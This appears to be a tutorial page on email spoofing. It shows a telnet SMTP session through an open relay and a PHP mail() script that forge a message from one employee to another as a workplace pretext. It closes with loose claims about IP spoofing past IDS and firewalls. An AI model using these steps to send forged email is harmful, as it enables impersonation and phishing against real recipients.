E-mail Spoofing
Email spoofing is a way to forge an email from one person to another. This can be done several different ways, through PHP, ASP, and other web languages, and also can be done through an open relay. An open relay refers to an SMTP (Simple Mail Transfer Protocol) server (see "Protocols") that isn’t properly configured and allows for an attacker or user to send email from anywhere to anywhere. To forge an email using an open relay, an attacker would have to use the telnet command (see MS-DOS) to open a connection to the open relay on port 25. The attacker wants to send an email from [email protected] to [email protected] so he clicks start, then goes to the run dialogue, and types cmd.exe, pressing enter before typing the following:
telnet openrelay.net 25
HELO joe.i.am MAIL FROM : [email protected] RCPT TO : [email protected] data Subject : Off Work I’ll be off work from Tuesday until Friday but I’ve assigned John Doe to take my place while I’m out of the office. Thanks, Joe .
Commands in more detail can be found in the RFC referenced in protocols, but this is a line-by-line explanation:
Opens a connection to openrelay.net on TCP port 25
telnet openrelay.net 25
The attacker identifies his machine as joe.i.am using the HELO command, which precedes all SMTP communications
HELO joe.i.am
Sets the email address in the “From:” field of an email to [email protected]
MAIL FROM : [email protected]
Sets the recipient to [email protected]
RCPT TO : [email protected]
This tells the SMTP server that the attacker is ready to enter the subject and body of his or her spoofed email. At the end of the body, the attacker must tell the server that the email is finished by inputting a period by itself on a line.
data
This tells the SMTP server that the subject of the email is “Off Work”, then the attacker types the body of the email
Subject : Off Work
Tells the SMTP Server that the end of the email has been reached and it is time to send the email.
.
As mentioned previously, this technique can also be done with virtually any web language. PHP code is as follows for the same email:
<syntaxhighlight lang="php"> <? $message = "I’ll be off work from Tuesday until Friday but I’ve”; $message .= “ assigned John Doe to take my place while I’m out of”; $message .= “the office.\r\nThanks,\r\nJoe”; $subject = "Off Work"; $toEmail="[email protected]"; $headers = 'From: <[email protected]>'; mail($toEmail, $subject, $message, $headers); ?> </syntaxhighlight>
The above code written to a .php file and accessed over HTTP will send an email. The attacker might save the code in a file called mailspoof.php and upload it to atax.net, then request the URL http://atax.net/mailspoof.php and the email will be sent.
There are a few other problems posed by internet protocol spoofing. Those who can spoof IP addresses and have a 0day exploit may only need to send one packet to take over a machine, and may spoof-exploit their way into a server leaving even the ISP with no real record of who committed the crime. Another problem with spoofing is that during scanning phases an attacker could spoof multiple scans from multiple machines, filling up an IDS’s allowed event space and slipping through the IDS unnoticed. Another flaw is that using spoofing and multi-encapsulated packets an attacker could quite easily jump directly through a firewall by exploiting design flaws in the TCP/IP stack. This would enable an attacker to not only transverse and step through a firewall, but even allow the attacker to use a Cisco PIX device as a proxy (using segmentation/fragmented packets).
